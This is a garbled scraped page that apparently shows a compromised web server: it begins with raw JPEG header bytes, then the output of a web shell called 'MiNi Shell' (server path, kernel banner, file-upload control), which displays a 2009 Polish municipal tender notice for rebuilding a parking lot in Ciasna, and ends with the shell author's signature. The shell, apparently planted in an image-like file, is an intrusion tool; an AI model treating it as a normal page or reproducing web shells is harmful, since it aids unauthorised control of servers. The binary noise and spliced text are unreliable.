JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090717/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090717/243402-N-2009.html

<p class="kh_header"><b>Ciasna: Przebudowa parkingu zlokalizowanego pomiędzy ulicami Szkolną i Nową w Ciasnej.</b><br>
<b>Numer ogłoszenia: 243402 - 2009; data zamieszczenia: 17.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Ciasna , ul. Nowa 1a, 42-793 Ciasna, woj. śląskie, tel. 034 3535100 w. 19, faks 034 3535105.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ciasna.ug.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa parkingu zlokalizowanego pomiędzy ulicami Szkolną i Nową w Ciasnej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Zakres zamówienia:
2.1. Konstrukcja nawierzchni :
       2.1.1. - nawierzchnia z betonowej kostki brukowej - gr. 10 cm,
 2.1.2. - podsypka cementowo - piaskowa - gr. 4 cm,
 2.1.3. -  podbudowa z kruszywa łamanego (niesort 0/63mm) gr. 25 cm,
 2.1.4. - powierzchnia  -  2580,3 m2
   	
2.2. Warstwy konstrukcyjne chodnika:
       2.2.1. - nawierzchnia z betonowej kostki brukowej - gr. 8 cm,
       2.2.2. - podsypka cementowo - piaskowa - gr. 4 cm,
       2.2.3.  - podbudowa z kruszywa łamanego (niesort 0/63mm) o gr. 15 cm,
       2.2.4. - powierzchnia  - 659,8 m2

2.3. Warstwy konstrukcyjne zatoki autobusowej:
       2.3.1. - nawierzchnia z betonowej kostki brukowej - gr. 10 cm,
       2.3.2. - podsypka cementowo - piaskowa - gr. 5 cm,
       2.3.3.  - podbudowa z kruszywa łamanego (niesort 0/63mm) o gr. 30 cm,
       2.3.4. - powierzchnia  - 103,5 m2

2.4. Wykonanie odwodnienia drogi z rur:
       2.4.1. - rury PVC o śr. 315 mm - 205,5 m

2.5.  Budowa oświetlenia drogowego  w ilości  5 szt. latarń z 7 szt.  opraw oświetleniowych  
        wraz z budową linii kablowej..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.00.00-8, 45.23.30.00-9, 45.23.32.80-5, 45.31.11.00-1, 45.31.12.00-2, 45.31.57.00-5, 45.31.43.00-4, 45.31.42.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do przetargu  jest zobowiązany wnieść wadium w wysokości 8 000,- zł Wadium można wnieść w pieniądzu, poręczeniach lub gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych  przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit b ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Przedsiębiorczości (Dz. U. Nr 109 poz. 1158 oraz z 2002 r. Nr 25 poz. 253, Nr 66 poz. 596 i Nr  216 poz. 1824).
Wadium w postaci pieniądza należy wpłacić przelewem na konto Urzędu Gminy Nr 97 8457 0008 2012 0300 0231 0002. Wadium w formie niepieniężnej należy złożyć w oryginale w kasie Urzędu Gminy. Wymagana ważność tej formy wadium - 30 dni od daty otwarcia ofert.
Termin wpłaty wadium do dnia 10.08.2009r.  do godz. 13.00
Jeżeli wadium wpłacone jest przelewem na konto Urzędu, należy do ofert dołączyć dowód przelewu lub okazać go komisji przetargowej przed otwarciem.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział Wykonawcy, którzy: 
1)	spełniają warunki wynikające z art. 22 ust.1 ustawy, tzn.: 
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
            b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
                 i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne 
                 zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób  
                 zdolnych do wykonania zamówienia,

            c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
            d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
     2)   wykażą się odpowiednim doświadczeniem, tj.: w ostatnich 5 latach, a jeśli okres 
           prowadzenia działalności jest krótszy - w tym okresie, zrealizowali co najmniej:  
           -  dwa zadania w postaci wykonanych robót drogowych, placów chodników 
              obejmujących ułożenie kostki betonowej w ilości minimum 2500 m2 każde, 
           -  dwa zadania z zakresu budowy oświetlenia drogowego polegającego na ustawieniu 
              minimum 5 szt. latarń wraz z linią  kablową o długości minimum 200 m. W przypadku
              uczestnictwa w zadaniu podwykonawcy to podwykonawca musi pokazać dwa ww. 
              zadania.

3)	wykażą się dysponowaniem  osobami kierowników   budowy  w  branży drogowej i elektrycznej oraz przedłożą ich oświadczenia o podjęciu się obowiązków kierownika budowy na przedmiotowym zakresie prac. 
4)	dysponują sprzętem oraz kadrą osobową do wykonania zamówienia,
5)	posiadają odpowiedni potencjał ekonomiczny w celu wykonania zamówienia,
6)	są ubezpieczeni od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej, na wartość minimum kwoty ceny ofertowej.
7)	nie zalegają z opłatami podatków, składek na ubezpieczenie społeczne i zdrowotne oraz  nie byli karani sądowo w związku z zamówieniem publicznym,
8)	przedstawią kosztorys ofertowy szczegółowy na przedmiotowe zadanie..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Na potwierdzenie spełniania warunków udziału w postępowaniu określonych w rozdziale V niniejszej specyfikacji Wykonawcy muszą przedstawić następujące dokumenty: 
    a) aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do
        ewidencji  działalności gospodarczej wystawionego nie wcześniej niż sześć miesięcy 
        przed upływem  terminu składowania ofert,  
	
    b) zaświadczenie właściwego urzędu skarbowego oraz zaświadczenie właściwego   
        oddziału   ZUS  o  nie  zaleganiu przez  Wykonawcę  z opłatami  podatków,  opłat  oraz   
        składek na   ubezpieczenie zdrowotne i społeczne wystawione nie wcześniej niż trzy  
        miesiące przed  upływem terminu składania ofert

    c) aktualną informację z Krajowego Rejestru Karnego wystawiona nie wcześniej niż  
         sześć  miesięcy przed upływem terminu składania ofert w zakresie określonym w art 24  
         ust. 1 pkt 4 - 9 ustawy,

     d) dla potwierdzenia posiadania wymaganego w pkt V.2 doświadczenia należy przedłożyć:
         dokumenty wykazujące wykonanie dwóch zadań w postaci robót drogowych 
         obejmujących ułożenie kostki betonowej (drogi chodniki, place) w ilości 2500 m2 każde 
         oraz dwa zadania z zakresu budowy oświetlenia drogowego polegającego na ustawieniu 
         minimum 5 szt. latarń wraz z linią  kablową o długości minimum 200 m.
      Przedmiotowe wykazy muszą zawierać:
      - nazwę zadania z rodzajem wykonanych prac i miejscem realizacji,
      - zakres rzeczowy,
      - okres czasowy (data rozpoczęcia i zakończenia zadań),
      - potwierdzenie właściwego, rzetelnego i starannego wykonania przedmiotowych zadań przez
        inwestora.

     e)  aktualną na dzień otwarcia ofert  polisę  ubezpieczeniową  od odpowiedzialności cywilnej 
          w wysokości minimum kwoty ceny ofertowej.

    f)  umowę regulującą  współpracę podmiotów występujących wspólnie 

    g)  informację o osobach, które będą pełniły funkcje kierownika budowy w zakresie robót 
        drogowych i elektrycznych wraz  z załączeniem  uprawnień kierownika budowy w zakresie
        odpowiadającym przedmiotowi zamówienia  oraz zaświadczenia właściwego oddziału Izby
        Inżynierów Budownictwa potwierdzającego przynależność kierownika budowy do tej izby na 
        dzień składania ofert,

    h)  oświadczenia kierowników budów o podjęciu się obowiązków kierownika budowy na 
         przedmiotowym zadaniu, w zakresie robót drogowych i elektrycznych.


    i) oświadczenie o dysponowaniu sprzętem oraz kadrą osobową do wykonania zamówienia, 
        o  posiadaniu odpowiedniego potencjału ekonomicznego umożliwiającego wykonanie 
        zamówienia, o posiadaniu odpowiedniego doświadczenia w prowadzeniu zadań  o  zakresie  
        rzeczowym wyszczególnionym w SIWZ. (załącznik nr 3)

    j) kosztorys ofertowy szczegółowy na przedmiotowe zadanie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.bazagmin.pl/bip_ciasna.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzą Gminy Ciasna, ul. Nowa 1a, 42-793 Ciasna.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.08.2009 godzina 13:00, miejsce: Otwarcie ofert nastąpi w siedzibie Zamawiającego w Urzędzie Gminy w Ciasnej ul. Nowa 1a, I piętro, sala Nr 14 (sala posiedzeń)..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com